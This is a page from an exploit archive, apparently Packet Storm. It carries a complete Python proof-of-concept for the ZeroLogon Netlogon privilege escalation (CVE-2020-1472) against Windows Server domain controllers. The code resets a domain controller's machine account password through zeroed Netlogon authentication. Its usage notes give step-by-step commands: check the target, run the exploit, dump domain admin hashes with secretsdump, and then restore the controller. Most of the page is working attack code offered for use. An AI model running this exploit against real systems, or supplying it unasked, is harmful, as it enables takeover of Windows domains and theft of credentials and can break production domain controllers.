what you don't know can hurt you

Zerologon Netlogon Privilege Escalation

Zerologon Netlogon Privilege Escalation
Posted Nov 18, 2020
Authored by West Shepherd

Proof of concept exploit for the ZeroLogin Netlogon privilege escalation vulnerability.

tags | exploit, proof of concept
advisories | CVE-2020-1472
MD5 | ea7695085892f1f97ad5522bc93d5d3b

Zerologon Netlogon Privilege Escalation

Change Mirror Download
# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException


class Exploit:
def __init__(
self,
name='',
address='',
attempts=2000,
password=''
):
name = name.rstrip('$')
self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
.ServerSecureChannel
self.authenticator = self.getAuthenticator(stamp=0)
self.clearNewPasswordBlob = b'\x00' * 516
self.primaryName = ('\\\\%s' % name) + '\x00'
self.accountName = ('%s$' % name) + '\x00'
self.computerName = name + '\x00'
self.clientCredential = b'\x00' * 8
self.clientChallenge = b'\x00' * 8
self.negotiateFlags = 0x212fffff
self.address = address
self.max = attempts
self.dce = None
self.sessionKey = None
self.clientStoredCredential = None
self.password = password

def encodePassword(self, password):
if isinstance(password, str):
password = password.encode('utf-8')
return b'\x00' * (512 - len(password))\
+ password \
+ pack('<L', len(password))

def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = creds
authenticator['Timestamp'] = stamp
return authenticator

def serverReqChallenge(self):
try:
binding = epm.hept_map(
self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
)
self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
self.dce.connect()
self.dce.bind(nrpc.MSRPC_UUID_NRPC)
return nrpc.hNetrServerReqChallenge(
self.dce,
self.primaryName,
self.computerName,
self.clientChallenge
)
except BaseException as ex:
self.logError(ex)

def serverAuthenticate(self):
try:
auth = nrpc.hNetrServerAuthenticate3(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.clientCredential,
self.negotiateFlags
)
assert auth['ErrorCode'] == 0
self.logInfo('successfully authenticated')
return True
except nrpc.DCERPCSessionError as ex:
self.dce = None
if ex.get_error_code() == 0xc0000022:
return None
else:
self.logFail(ex.get_error_code())
except BaseException as ex:
self.dce = None
self.logFail(ex)
self.dce = None

def serverPasswordSet(self):
try:
return nrpc.hNetrServerPasswordSet2(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.authenticator,
self.clearNewPasswordBlob
)
except BaseException as ex:
self.logError(ex)

def authenticate(self):
self.logInfo(
'checking target, attempting to authenticate %d max
attempts' % self.max
)
for attempt in range(0, self.max):
self.logInfo('attempt %d' % attempt)
self.serverReqChallenge()
self.serverAuthenticate()
if self.dce is not None:
break
if self.dce:
return True
else:
self.logError('failed to authenticate')

def exploit(self):
self.logInfo('attempting password reset')
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully reset password')
else:
self.logError('failed to reset password')
return self

def ComputeNetlogonCredentialAES(self, challenge):
return nrpc.ComputeNetlogonCredentialAES(
challenge,
self.sessionKey
)

def logInfo(self, message):
sys.stdout.write("[+] %s\n" % str(message))
return self

def logError(self, message):
sys.stderr.write("[-] error %s\n" % str(message))

def logFail(self, message):
sys.stderr.write("[!] failure %s\n" % str(message))
sys.exit(2)

def restore(self):
self.logInfo('attempting to restore password')
self.clientChallenge = b'12345678'
try:
self.primaryName = NULL
challenge = self.serverReqChallenge()
self.sessionKey = nrpc.ComputeSessionKeyAES(
'', self.clientChallenge, challenge['ServerChallenge']
)
self.clientCredential = self.ComputeNetlogonCredentialAES(
self.clientChallenge
)
try:
self.serverAuthenticate()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.logInfo('restoring password')
self.clientStoredCredential = pack('<Q', unpack('<Q',
self.clientCredential)[0] + 10)
self.authenticator = self.getAuthenticator(

creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
)
self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
self.encodePassword(self.password)
)
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully restored password')
else:
self.logError('failed to restore password')
except Exception as ex:
self.logError(ex)
return self


if __name__ == '__main__':
info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:

1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>

2. Exploit the DC - this will break the DC until restored:
cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>

3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>

4. Dump the DC again - use the DA hash to get the machines hex-pass:
secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>

5. Restore target - this fixes the DC:
cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
parser = argparse.ArgumentParser(
description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
add_help=True
)
try:
parser.add_argument('-do', default='check', action='store',
help='What to do (default check):
[check|restore|exploit]')
parser.add_argument('-target', action='store',
help='NETBIOS name of target DC (not the FQDN)')
parser.add_argument('-ip', action='store',
help='IP address of target DC')
parser.add_argument('-password', default='', action='store',
help='The plaintext password to use to
reset the DC')
parser.add_argument('-hex', default='', action='store',
help='The hex password to use to restore
the DC (recommended)')
parser.add_argument('-max', default=2000, action='store',
help='Max attempts to authenticate with
the DC (usually ~300 or less)')

if len(sys.argv) < 3:
parser.print_help()
print(info)
sys.exit(1)
options = parser.parse_args()

if options.do.lower() == 'check':
Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
).authenticate()
elif options.do.lower() == 'exploit':
exp = Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
)
if exp.authenticate():
exp.exploit()
elif options.do.lower() == 'restore':
if options.hex != '' and options.password == '':
options.password = unhexlify(options.hex)
if options.password != '':
exp = Exploit(
name=options.target,
address=options.ip,
password=options.password
).restore()
else:
parser.print_help()

except Exception as error:
sys.stderr.write('[-] error in main %s\n' % str(error))

Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    1 Files
  • 29
    Nov 29th
    11 Files
  • 30
    Nov 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close